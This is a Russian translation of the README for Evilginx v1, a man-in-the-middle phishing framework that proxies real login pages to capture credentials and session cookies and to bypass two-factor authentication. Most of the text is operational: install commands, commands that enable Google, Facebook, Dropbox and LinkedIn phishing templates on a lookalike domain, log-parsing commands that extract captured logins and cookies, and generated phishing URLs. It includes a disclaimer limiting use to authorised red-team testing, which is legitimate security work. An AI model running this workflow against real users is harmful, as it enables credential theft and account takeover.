
ПОЖАЛУЙСТА, ИСПОЛЬЗУЙТЕ НОВУЮ ВЕРСИЮ: https://github.com/kgretzky/evilginx2

ЭТА ВЕРСИЯ УСТАРЕЛА. ПОЖАЛУЙСТА, ИСПОЛЬЗУЙТЕ ПОСЛЕДНЮЮ ВЕРСИЮ!
EVILGINX 2: https://github.com/kgretzky/evilginx2
Evilginx — это фреймворк для атак типа «человек посередине», используемый для фишинга учётных данных и сессионных куки любого веб-сервиса. Его ядро работает на HTTP-сервере Nginx, который использует proxy_pass и sub_filter для проксирования и изменения HTTP-контента, перехватывая трафик между клиентом и сервером.
Вы можете узнать, как это работает и как установить всё самостоятельно, в моём блоге:
Первая статья слегка устарела: Evilginx — продвинутый фишинг с обходом двухфакторной аутентификации
Обновление Evilginx 1.0: Evilginx 1.0 Update — Up Your Game in 2FA Phishing
Обновление Evilginx 1.1: Evilginx 1.1 Update
Я осознаю, что Evilginx может использоваться для весьма злонамеренных целей. Эта работа является лишь демонстрацией того, на что способны опытные злоумышленники. Ответственность защитника — учитывать такие атаки при настройке защиты и находить способы защиты от этого метода фишинга. Evilginx следует использовать только в легитимных заданиях по тестированию на проникновение с письменного разрешения сторон, которые будут подвергнуты фишингу.
Evilginx предоставляет скрипт установки install.sh, который заботится об установке всего пакета на любой машине с Debian wheezy/jessie по принципу «установил и забыл».
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
Включите или отключите конфигурации сайтов для использования с сервером Nginx, используя предоставленные шаблоны Evilginx из каталога sites.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Your phishing domain.
-y Answer all questions with 'Yes'.
-l, --list List available supported apps.
--enable ENABLE Enable following site by name.
--disable DISABLE Disable following site by name.
Список доступных шаблонов конфигурации сайтов:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
Включите фишинговый сайт Google с предварительно зарегистрированным фишинговым доменом not-really-google.com:
python evilginx.py setup --enable google -d not-really-google.com
Отключите фишинговый сайт Facebook:
python evilginx.py setup --disable facebook
Парсинг логов Nginx для извлечения перехваченных учётных данных и сессионных куки. По умолчанию логи сохраняются в каталоге logs, где находится скрипт evilginx.py.
Это можно делать автоматически после включения авто-парсинга на этапе Настройка.
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to parse logs for ('all' to parse logs
for all sites).
--debug Does not truncate log file after parsing.
Парсинг логов только для сайта Google:
python evilginx.py parse -s google
Парсинг логов для всех доступных сайтов:
python evilginx.py parse -s all
Создание фишинговых URL, которые можно использовать в оценках Red Team.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to generate link for.
-r REDIRECT, --redirect REDIRECT
Redirect user to this URL after successful sign-in.
Создание фишингового URL для Google, который перенаправит жертву на видео с Rick Roll после успешного входа:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ